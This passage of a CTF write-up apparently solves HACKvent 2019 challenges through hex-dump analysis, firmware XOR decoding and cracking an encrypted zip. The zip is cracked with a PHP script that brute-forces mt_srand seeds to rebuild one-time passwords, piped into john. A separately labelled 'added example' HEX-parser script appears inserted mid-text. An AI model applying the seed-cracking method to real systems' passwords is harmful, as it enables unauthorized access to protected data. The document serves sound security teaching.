84B5826084BD84B5C8\n:1007B000816084BD85B5826085BD85B5816085BD5C\n:1007C00080916E00816080936E0010928100809114\n:1007D000810082608093810080918100816080939C\n:1007E0008100809180008160809380008091B100C1\n:1007F00084608093B1008091B00081608093B000EC\n:1008000080917A00846080937A0080917A0082607F\n:1008100080937A0080917A00816080937A00809141\n:100820007A00806880937A001092C1000E9495033C\n:10083000C0E0D0E00E948C022097E1F30E94E70024\n:100840008823C1F30E940000F5CFA1E21A2EAA1B53\n:1008500
0BB1BFD010DC0AA1FBB1FEE1FFF1FA21770\n:10086000B307E407F50720F0A21BB30BE40BF50B6D\n:10087000661F771F881F991F1A9469F760957095F6\n:10088000809590959B01AC01BD01CF010895EE0FBD\n:0E089000FF1F0590F491E02D0994F894FFCF1E\n:10089E00303133394853565F61636467686C6D6EEF\n:1008AE00727478797B7D002020202020202020204B\n:1008BE00202020202020202020202020202020202A\n:1008CE00202020202020202020202020202020201A\n:1008DE00202000000000001D017D00AA006A01DB3F\n:0808EE0000B900CD000D0A0065\n:00000001FF<\/pre>\n<br\/>We can use <code>AVR Studio 4<\/code> to disassemble the binary.\n<br\/>\n<br\/>One very flashy region within the memory dump should catch our eye:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/22_01_avr.png\" width=\"1000px\"\/>\n<br\/>\n<br\/>The memory holds an alphabet containing the following letters: <code>0139HSV_acdghlmnrtxy{}<\/code>. Obviously this is used for the flag since it contains all the necessary characters (<code>HV19{}<\/code>).\n<br\/>\n<br\/>With this in mind, let's get an overview of the disassembly output. We should especially look out for references to the alphabet.\n<br\/>\n<br\/>Scrolling over the disassembly, the following part seems to be interesting:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/22_02_avr.png\" width=\"1000px\"\/>\n<br\/>\n<br\/>These instructions load data from memory and store it at another address. What is especially notable here is that the addresses from which the data is loaded sometimes repeat like <code>0x102<\/code>, which is used three times in the above screenshot. The addresses at which the data is stored seem to be used uniquely. This sounds exactly like an alphabet being used to create a string within another memory region. 
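As an added example (not the author's code), a small Intel HEX parser with checksum verification that pulls the alphabet out of the image without a disassembler: it builds an address-to-byte map from the records and scans it for printable runs the way `strings` would. The three records embedded in it are copied from the dump above; the rest of the image is left out.

```python
#!/usr/bin/env python3
"""Recover the flag alphabet from the Arduino image with an Intel HEX parser.

Added example, not the writeup's own code: parses Intel HEX records (with
checksum verification) into an address->byte map and searches it for
printable strings the way `strings` would. The three records below are
copied from the dump in the writeup; the rest of the image is omitted.
"""

# Sample input copied from the dump above: the two data records that hold
# the alphabet (flash address 0x089E onwards) plus the EOF record.
SAMPLE_HEX = """\
:10089E00303133394853565F61636467686C6D6EEF
:1008AE00727478797B7D002020202020202020204B
:00000001FF
"""


def parse_ihex(text):
    """Return {address: byte} for all data records in an Intel HEX string.

    Handles record types 00 (data), 01 (EOF) and 04 (extended linear
    address). Every record's byte count and checksum are verified; a corrupt
    record raises ValueError.
    """
    memory = {}
    upper = 0                       # upper 16 address bits from a type-04 record
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        if not line.startswith(":"):
            raise ValueError(f"line {lineno}: record must start with ':'")
        raw = bytes.fromhex(line[1:])
        if len(raw) < 5 or len(raw) != 5 + raw[0]:
            raise ValueError(f"line {lineno}: byte count does not match record")
        # The checksum is the two's complement of the sum of all other bytes,
        # so every byte of a valid record sums to 0 modulo 256.
        if sum(raw) & 0xFF:
            raise ValueError(f"line {lineno}: bad checksum")
        count, addr, rtype = raw[0], int.from_bytes(raw[1:3], "big"), raw[3]
        data = raw[4:4 + count]
        if rtype == 0x00:
            for i, b in enumerate(data):
                memory[upper + addr + i] = b
        elif rtype == 0x01:
            break
        elif rtype == 0x04:
            upper = int.from_bytes(data, "big") << 16
        else:
            raise ValueError(f"line {lineno}: unsupported record type {rtype:#04x}")
    return memory


def is_valid_ihex(text):
    """True if every record parses and passes its checksum."""
    try:
        parse_ihex(text)
        return True
    except ValueError:
        return False


def cstring_at(memory, address):
    """Read a NUL-terminated ASCII string starting at address."""
    out = bytearray()
    while memory.get(address, 0):
        out.append(memory[address])
        address += 1
    return out.decode("ascii")


def find_strings(memory, min_len=10):
    """Like `strings`: (address, text) for each run of >= min_len printable bytes."""
    runs, start, cur = [], None, bytearray()

    def flush():
        if len(cur) >= min_len:
            runs.append((start, cur.decode("ascii")))

    for addr in sorted(memory):
        b = memory[addr]
        printable = 0x20 <= b < 0x7F
        if printable and start is not None and addr == start + len(cur):
            cur.append(b)           # contiguous with the current run
            continue
        flush()
        start, cur = (addr, bytearray([b])) if printable else (None, bytearray())
    flush()
    return runs


def main():
    memory = parse_ihex(SAMPLE_HEX)
    for addr, text in find_strings(memory):
        print(f"{addr:#06x}: {text!r}")
    print("alphabet:", cstring_at(memory, 0x089E))


if __name__ == "__main__":
    main()
```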
Accordingly let's write down the mapping:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/22# cat mapping\n102     134\n114     11b\n111     12a\n102     125\n100     13c\n102     122\n113     11e\n112     138\n110     13d\n102     12d\n102     128\n111     139\n10f     13e\n107     13a\n10d     121\n107     131\n107     12e\n10a     123\n103     11a\n102     13f\n106     118\n110     140\n10b     124\n10e     127\n108     12f\n115     141\n111     130\n107     11f\n102     137\n10f     136\n102     129\n10e     12c\n107     126\n104     11c\n101     119\n107     135\n104     117\n105     120\n10c     133\n107     12b\n102     11d\n<\/pre>\n<br\/>According to our assumption the first value is an index into the alphabet and the second value is the destination address for the corresponding character of the alphabet. The smallest index used is <code>0x100<\/code> and the smallest destination address is <code>0x117<\/code>. 
The following python script iterates over the mapping and inserts the referenced character from the alphabet at the corresponding position within the destination string:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nalpha = '0139HSV_acdghlmnrtxy{}'\n\nlines = open('mapping').read().split('\\n')[:-1]\nflag = [' '] * 50\n\nfor line in lines:\n  values = line.split('\\t')\n  idx = int(values[0], 16) - 0x100\n  dst = int(values[1], 16) - 0x117\n  flag[dst] = alpha[idx]\n\nprint(''.join(flag))<\/pre>\n<br\/>Running the script prints the flag, although two characters are missing:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/22# .\/flag.py\nHV19{H3y_Sl3dg3_m33t_m3_at_ h3_n3xt_ 0rn3r}\n<\/pre>\n<br\/>Two characters are missing because the following two load\/store sequences contain a zero destination address \/ index: \n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/22_03_avr.png\" width=\"700px\"\/>\n<br\/>\n<br\/>The first sequence loads the letter <code>'c'<\/code> (<code>0x109<\/code>), which obviously is supposed to be stored at <code>0x13b<\/code>. 
Also the missing character supposed to be stored at <code>0x132<\/code> is obviously the letter <code>'t'<\/code>.\n<br\/>\n<br\/>Thus the flag is <span class=\"spanFlag\">HV19{H3y_Sl3dg3_m33t_m3_at_th3_n3xt_c0rn3r}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.23\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.23 - Internet&nbsp;Data&nbsp;Archive<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_23.png\" \/><\/td><td style=\"color:#333333\">Author: M.<\/td><\/tr><tr><td colspan=\"2\">Today's flag is available in the Internet Data Archive (IDA).\n<br\/>\n<br\/><span class=\"link\">http:\/\/whale.hacking-lab.com:23023\/<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided link leads to the <code>Internet Data Archive<\/code>. We can enter a username and select different challenges from the past. There is also a disabled flag checkbox:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/23_01_ida.png\" width=\"600px\"\/>\n<br\/>\n<br\/>After submitting the request a one-time password is displayed and we can download our archive:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/23_02_otp.png\" width=\"500px\"\/>\n<br\/>\n<br\/>The archive is a zip file, which contains the challenges we selected:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# wget http:\/\/whale.hacking-lab.com:23023\/tmp\/bobby-data.zip\n--2019-12-28 11:02:11--  http:\/\/whale.hacking-lab.com:23023\/tmp\/bobby-data.zip\nResolving whale.hacking-lab.com (whale.hacking-lab.com)... 80.74.140.188\nConnecting to whale.hacking-lab.com (whale.hacking-lab.com)|80.74.140.188|:23023... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 47074 (46K) [application\/zip]\nSaving to: \u2018bobby-data.zip\u2019\n\nbobby-data.zip                100%[=================================================&gt;]  45.97K  --.-KB\/s    in 0.06s\n\n2019-12-28 11:02:11 (803 KB\/s) - \u2018bobby-data.zip\u2019 saved [47074\/47074]\n\nroot@kali:~\/hv19\/23# file bobby-data.zip\nbobby-data.zip: Zip archive data, at least v2.0 to extract\nroot@kali:~\/hv19\/23# zipinfo bobby-data.zip\nArchive:  bobby-data.zip\nZip file size: 47074 bytes, number of entries: 2\n-rw-rw-rw-  6.3 unx    46565 Bx u099 19-Sep-21 13:35 ball15.png\n-rw-rw-rw-  6.3 unx      727 Bx u099 19-Sep-21 13:25 cake.txt\n2 files, 47292 bytes uncompressed, 46796 bytes compressed:  1.0%\n<\/pre>The archive can be uncompressed\/decrypted using the provided one-time password:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# 7z x bobby-data.zip\n\n7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21\np7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Celeron(R) CPU N3450 @ 1.10GHz (506C9),ASM,AES-NI)\n\nScanning the drive for archives:\n1 file, 47074 bytes (46 KiB)\n\nExtracting archive: bobby-data.zip\n--\nPath = bobby-data.zip\nType = zip\nPhysical Size = 47074\n\n\nEnter password (will not be echoed): (Sw6q4QJmvBwv)\nEverything is Ok\n\nFiles: 2\nSize:       47292\nCompressed: 47074<\/pre>\n<br\/>The link to our archive looks like this: <code>http:\/\/whale.hacking-lab.com:23023\/tmp\/bobby-data.zip<\/code>. 
When simply browsing to <code>http:\/\/whale.hacking-lab.com:23023\/tmp\/<\/code> we can see that directory listing is enabled for this folder:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/23_03_dirlist.png\" width=\"700px\"\/>\n<br\/>\n<br\/>Browsing through the uploaded files we can spot a file with a much older <code>last modified<\/code> timestamp:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/23_04_santa_archive.png\" width=\"700px\"\/>\n<br\/>\n<br\/>This archive actually contains the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# wget http:\/\/whale.hacking-lab.com:23023\/tmp\/Santa-data.zip\n--2019-12-28 11:10:05--  http:\/\/whale.hacking-lab.com:23023\/tmp\/Santa-data.zip\nResolving whale.hacking-lab.com (whale.hacking-lab.com)... 80.74.140.188\nConnecting to whale.hacking-lab.com (whale.hacking-lab.com)|80.74.140.188|:23023... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 349592 (341K) [application\/zip]\nSaving to: \u2018Santa-data.zip\u2019\n\nSanta-data.zip                100%[=================================================&gt;] 341.40K  --.-KB\/s    in 0.1s\n\n2019-12-28 11:10:06 (2.34 MB\/s) - \u2018Santa-data.zip\u2019 saved [349592\/349592]\n\nroot@kali:~\/hv19\/23# zipinfo Santa-data.zip\nArchive:  Santa-data.zip\nZip file size: 349592 bytes, number of entries: 6\n-rw-rw-rw-  6.3 unx       37 Bx u099 19-Sep-22 16:31 flag.txt\n-rw-rw-rw-  6.3 unx   120979 Bx u099 19-Aug-04 09:53 pearl.png\n-rw-rw-rw-  6.3 unx    46565 Bx u099 19-Sep-21 15:35 ball15.png\n-rw-rw-rw-  6.3 unx      727 Bx u099 19-Sep-21 15:25 cake.txt\n-rw-rw-rw-  6.3 unx   183606 Bx u099 18-Dec-27 18:14 blindball.png\n-rw-rw-rw-  6.3 unx     2560 Bx u099 19-Sep-22 00:49 GoodOldTimes.exe\n6 files, 354474 bytes uncompressed, 348782 bytes compressed:  1.6%<\/pre>Unfortunately we don't know the corresponding one-time password.\n<br\/>\n<br\/>The abbreviation for the website (the website's title is even called <code>IDA PRO<\/code>) doesn't seem to be a coincidence. A little bit of googling reveals <a href=\"https:\/\/devco.re\/blog\/2019\/06\/21\/operation-crack-hacking-IDA-Pro-installer-PRNG-from-an-unusual-way-en\/\" rel=\"noopener noreferrer\" target=\"_blank\">this blog post<\/a>, which describes how to generate an <code>IDA Pro<\/code> (<code>Interactive Disassembler<\/code>) installation password. As it happens the charset for the one-time password seems to be exactly the same as well as the password length.\n<br\/>\n<br\/>The mentioned blog post provides a perl script, which generates installation passwords. 
In order to do this the script initializes the PRNG with a seed (<code>srand<\/code>) and then generates 12 random numbers modulo <code>54<\/code> which are used as an index into the alphabet being used (<code>abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789<\/code>).\n<br\/>\n<br\/>The following solution is probably not the most sophisticated one since the internal details of the implementation are not taken into account, but it simply worked \ud83d\ude42 Thanks to <code>Tyrox<\/code> for giving me a good hint on this one.\n<br\/>\n<br\/>The previously mentioned perl script uses perl to generate the one-time passwords and is thus using perl's PRNG. The challenge's website is using PHP. Thus the assumption that it is using the PHP PRNG to generate the one-time passwords is not that far-off. If we rebuild the mentioned perl script in PHP with the appropriate PRNG we might be able to crack Santa's zip archive.\n<br\/>\n<br\/>At first let's create a hash from the zip archive which can be processed by <code>john<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# zip2john Santa-data.zip\nSanta-data.zip\/flag.txt:$zip2$*0*1*0*d75ebd89add5cf76*75ca*25*8249d36387bf723d66085cb4334858bc69989550a643c4a614645d505889e91bdbd269787a*fe232081a44c398eeab9*$\/zip2$:flag.txt:Santa-data.zip:Santa-data.zip\nver 1.0 Santa-data.zip\/flag.txt PKZIP Encr: cmplen=57, decmplen=37, crc=B31E19FF\nver 2.0 Santa-data.zip\/pearl.png PKZIP Encr: cmplen=119024, decmplen=120979, crc=8994CA4C\nver 2.0 Santa-data.zip\/ball15.png PKZIP Encr: cmplen=46510, decmplen=46565, crc=5E20478F\nver 2.0 Santa-data.zip\/cake.txt PKZIP Encr: cmplen=310, decmplen=727, crc=25981C5A\nver 2.0 Santa-data.zip\/blindball.png PKZIP Encr: cmplen=182328, decmplen=183606, crc=F0442C30\nver 2.0 Santa-data.zip\/GoodOldTimes.exe PKZIP Encr: cmplen=625, decmplen=2560, 
crc=EF6B229B\nSanta-data.zip:$pkzip2$3*1*1*0*63*24*5e20*7c67*69e5d5637af3005ba4c1061964f8037c23d4d912fd8dd6bc59e65eadfc791a5c163461bc*1*0*63*24*8994*4eaf*99dc5ea6d837c104740f6d9e883d8b4c44028b2c0eed3f575925352e966cbe3c96c49176*2*0*39*25*b31e19ff*0*31*63*39*b31e*83ea*d75ebd89add5cf7675ca8249d36387bf723d66085cb4334858bc69989550a643c4a614645d505889e91bdbd269787afe232081a44c398eeab9*$\/pkzip2$::Santa-data.zip:flag.txt, ball15.png, pearl.png:Santa-data.zip\nNOTE: It is assumed that all files in each archive have the same password.\nIf that is not the case, the hash may be uncrackable. To avoid this, use\noption -o to pick a file at a time.\nroot@kali:~\/hv19\/23\/t# zip2john Santa-data.zip &gt; santa-hash.txt\n...<\/pre>\n<br\/>Now we need to rebuild the perl script in PHP:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">&lt;?php\n\n$alpha = 'abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789';\n\nfor ($i = 0; $i &lt; 0x100000000000; $i++) {\n  mt_srand($i);\n  $pw = '';\n  for ($j = 0; $j &lt; 12; $j++) {\n    $pw .= $alpha[mt_rand(0,53)];\n  }\n  echo $pw.\"\\n\";\n}\n\n?&gt;\n<\/pre>\n<br\/>The PHP script defines the alphabet from the previously mentioned blog post and continuously initializes the PRNG by calling <code>mt_srand<\/code> with another number (<code>$i<\/code>) followed by the generation of the one-time password.\n<br\/>\n<br\/>All generated one-time passwords are printed to stdout:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# php crackOTP.php | head\nDj3BC7CRRj9x\nJfvKCwGA9QxT\nQsPaYTQqYsWR\nUKRykpBmCb8Z\nzHJ3yKueWjUD\nP4hTYMk3gFR4\nY77c8j3p2afh\njUXSqsPVeu8b\nZUjdXe87Khim\nFzvf6rCthmaF\n<\/pre>\n<br\/>In order to directly pipe the generated passwords to john, we can use the <code>--stdin<\/code> option:\n<br\/><pre 
style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# php crackOTP.php | john --stdin santa-hash.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128\/128 SSE2 4x])\nWill run 2 OpenMP threads\nPress Ctrl-C to abort, or send SIGUSR1 to john process for status\n<\/pre>\n<br\/>After a few minutes we actually get a hit:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\nKwmq3Sqmc5sA     (Santa-data.zip\/flag.txt)\n1g 0:00:10:12  0.001633g\/s 7079p\/s 7079c\/s 7079C\/s jDdDjuYS9mBG..ApwYqaWtC2Zh\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed\n<\/pre>\n<br\/>The password <code>Kwmq3Sqmc5sA<\/code> can be used to uncompress\/decrypt the archive:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# 7z x Santa-data.zip\n\n7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21\np7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Celeron(R) CPU N3450 @ 1.10GHz (506C9),ASM,AES-NI)\n\nScanning the drive for archives:\n1 file, 349592 bytes (342 KiB)\n\nExtracting archive: Santa-data.zip\n--\nPath = Santa-data.zip\nType = zip\nPhysical Size = 349592\n\n\nEnter password (will not be echoed): (Kwmq3Sqmc5sA)\nEverything is Ok\n\nFiles: 6\nSize:       354474\nCompressed: 349592<\/pre>\n<br\/>We actually got the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# cat flag.txt\nHV19{Cr4ckin_Passw0rdz_like_IDA_Pr0}<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Cr4ckin_Passw0rdz_like_IDA_Pr0}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.24\"\/><span style=\"float:right;\"><a 
href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.24 - ham&nbsp;radio<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_24.png\" \/><\/td><td style=\"color:#333333\">Author: DrSchottky<\/td><\/tr><tr><td colspan=\"2\">Elves built for Santa a special radio to help him coordinate today's present delivery.\n<br\/>\n<br\/><span class=\"link\">HV19-ham radio.zip<\/span>\n<br\/>\n<br\/>As a little present and in order not to screw up your whole Christmas, you have 3 whole days to solve this puzzle.\n<br\/>\n<br\/>Happy Christmas!<\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a file called <code>brcmfmac43430-sdio.bin<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/24# unzip 19bf7592-f3ee-474c-bf82-233f270bbf70.zip\nArchive:  19bf7592-f3ee-474c-bf82-233f270bbf70.zip\n  inflating: brcmfmac43430-sdio.bin\nroot@kali:~\/hv19\/24# file brcmfmac43430-sdio.bin\nbrcmfmac43430-sdio.bin: data<\/pre>By googling for the filename and trawling through the <a href=\"https:\/\/github.com\/DrSchottky\" rel=\"noopener noreferrer\" target=\"_blank\">challenge author's GitHub repo<\/a>, it seemed likely that the challenge is related to <a href=\"https:\/\/github.com\/seemoo-lab\/nexmon\" rel=\"noopener noreferrer\" target=\"_blank\">nexmon<\/a>. Accordingly the file seems to be a firmware for a Broadcom 43430 wireless chipset.\n<br\/>\n<br\/>Since <code>file<\/code> didn't even identify any known file type (<code>data<\/code>), I wondered which processor architecture this kind of chipset is using. After a bit of googling once again, I stumbled upon <a href=\"https:\/\/blog.quarkslab.com\/reverse-engineering-broadcom-wireless-chipsets.html\" rel=\"noopener noreferrer\" target=\"_blank\">this well written blog post<\/a>. 
Besides plenty of details on how to reverse engineer a Broadcom wireless chipset, the blog post contains a table which states that the <code>bcm43430<\/code> is using an <code>ARM Cortex M3<\/code>. With this information let's fire up <code>ghidra<\/code> and see if it can decompile the binary.\n<br\/>\n<br\/>Indeed <code>ghidra<\/code> offers a big endian and a little endian ARM Cortex architecture. By selecting the second one (little endian) ...\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_01_ghidra_arc.png\" width=\"500px\"\/>\n<br\/>\n<br\/>... the binary can actually be decompiled:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_02_ghidra_decompl.png\" width=\"900px\"\/>\n<br\/>\n<br\/>There are plenty of functions since we are facing a whole firmware. My assumption was that the flag related code will probably use XOR. The ARM instruction for XOR is called <code>EOR<\/code>. Thus I started to search for <code>EOR<\/code> within the instruction mnemonics. 
Of course there are quite a few parts in the code, which use XOR, but the following part is obviously not part of the ordinary firmware:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_03_ghidra_eor.png\" width=\"900px\"\/>\n<br\/>\n<br\/>We can see a reference to a base64 string, which can also be revealed by simply using <code>strings<\/code> on the binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/24# strings brcmfmac43430-sdio.bin\n...\n8hyh\n8iyi\nAF3FHF\n2F(F\nUm9zZXMgYXJlIHJlZCwgVmlvbGV0cyBhcmUgYmx1ZSwgRHJTY2hvdHRreSBsb3ZlcyBob29raW5nIGlvY3Rscywgd2h5IHNob3VsZG4ndCB5b3U\/\npGnexmon_ver: 2.2.2-269-g4921d-dirty-16\nwl%d: Broadcom BCM%s 802.11 Wireless Controller %s\n...<\/pre>\n<br\/>Though the string only contains a message from the author:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/24# echo Um9zZXMgYXJlIHJlZCwgVmlvbGV0cyBhcmUgYmx1ZSwgRHJTY2hvdHRreSBsb3ZlcyBob29raW5nIGlvY3Rscywgd2h5IHNob3VsZG4ndCB5b3U\/|base64 -d\nRoses are red, Violets are blue, DrSchottky loves hooking ioctls, why shouldn't you?<\/pre>\n<br\/>The part of the decompiled output, which looks really juicy, is the following:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_04_juciy.png\" \/>\n<br\/>\n<br\/>Two variables are initialized (<code>pbVar2<\/code> and <code>pbVar3<\/code>) followed by a loop, which XORs every byte of the data being referenced by both of those two variables. This obviously looks like the flag being <i>\"decrypted\"<\/i>. 
The data, which is referenced, is stored at <code>0x00058e94<\/code> and <code>0x00058eac<\/code> respectively (the correct addresses can be read from the disassembly output):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_05_data.png\" width=\"900px\"\/>\n<br\/>\n<br\/>Though when reassembling the part of the code in python ...\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nv1 = '\\x09\\xBC\\x31\\x3A\\x68\\x1A\\xAB\\x72\\x47\\x86\\x7E\\xE6\\x4A\\x1D\\x6F\\x04\\x2E\\x74\\x50\\x0D\\x78\\x06\\x3E\\x00'\nv2 = '\\x6A\\x91\\x44\\x3B\\xBE\\x27\\x15\\x92\\x07\\xC9\\xF3\\x47\\x77\\xED\\xE5\\x26\\x10\\x76\\x74\\x80\\x57\\x1F\\x00'\n\nout = ''\nfor i in range(len(v2)):\n  out += chr(ord(v1[i]) ^ ord(v2[i]))\n\nprint(out)\nprint(out.encode('hex'))<\/pre>\n<br\/>... we only get rubbish:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/24# .\/decrypt.py\nc-u\u2592=\u2592\u2592@O\u2592\u2592=\u2592\"&gt;$\u2592\/&gt;\n632d7501d63dbee0404f8da13df08a223e02248d2f193e\n<\/pre>\n<br\/>Further inspecting the decompiled output we can notice a few calls to functions being located at addresses <code>&gt;= 0x0080000<\/code>. 
Also, at the end of the decompiled function there is a call to <code>0x0000239<\/code>, which is passed the address of one of the potential flag data buffers (<code>0x00058eac<\/code>) as well as <code>0x800000<\/code> and <code>0x17<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_06_func.png\" \/>\n<br\/>\n<br\/>This function uses the second parameter (<code>0x0080000<\/code>) as a reference and exchanges values with the first parameter (the potential flag data):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_07_func_rom.png\" width=\"900px\"\/>\n<br\/>\n<br\/>When searching through the <a href=\"https:\/\/github.com\/seemoo-lab\/nexmon\" rel=\"noopener noreferrer\" target=\"_blank\">nexmon GitHub repo<\/a> I stumbled upon this <a href=\"https:\/\/github.com\/seemoo-lab\/nexmon\/blob\/master\/firmwares\/bcm43430a1\/7_45_41_26\/definitions.mk\" rel=\"noopener noreferrer\" target=\"_blank\">definitions.mk<\/a> file. 
In addition to the file which was provided in the challenge (<code>brcmfmac43430-sdio.bin<\/code>), there is a reference to another file called <code>rom.bin<\/code>, which seems to be loaded at the address <code>0x800000<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\nRAM_FILE=brcmfmac43430-sdio.bin\nRAMSTART=0x0\nRAMSIZE=0x80000\n\nROM_FILE=rom.bin\nROMSTART=0x800000\nROMSIZE=0xA0000\n...<\/pre>I really had a hard time finding this file, but it turned out that it can simply be found in another repo of <a href=\"https:\/\/github.com\/seemoo-lab\" rel=\"noopener noreferrer\" target=\"_blank\">seemoo-lab<\/a>: <a href=\"https:\/\/github.com\/seemoo-lab\/bcm_misc\/tree\/master\/bcm43430a1\" rel=\"noopener noreferrer\" target=\"_blank\">seemoo-lab \/ bcm_misc \/ bcm43430a1<\/a>.\n<br\/>\n<br\/>Since the data at <code>0x00058eac<\/code> seems to be exchanged by the function at <code>0x2390<\/code>, let's adjust our Python script to use the data from the <code>rom.bin<\/code> file instead:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\n# the 23 (0x17) bytes stored at 0x00058e94\nstack_vals = '\\x09\\xBC\\x31\\x3A\\x68\\x1A\\xAB\\x72\\x47\\x86\\x7E\\xE6\\x4A\\x1D\\x6F\\x04\\x2E\\x74\\x50\\x0D\\x78\\x06\\x3E'\n# rom.bin is mapped at 0x800000, so its first bytes replace the data at 0x00058eac\nkey = open('rom.bin', 'rb').read()\n\n# same byte-wise XOR as before, now keyed with the ROM bytes\nout = ''\nfor i in range(len(stack_vals)):\n  out += chr(ord(stack_vals[i]) ^ ord(key[i]))\n\nprint(out)\n<\/pre>\n<br\/>Running the script now actually outputs the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/24# .\/xorRom.py\nHV19{Y0uw3n7FullM4Cm4n}\n<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Y0uw3n7FullM4Cm4n}<\/span>.\n<br\/><br\/>\n","protected":false},"excerpt":{"rendered":"<p>This year&#8217;s HACKvent was 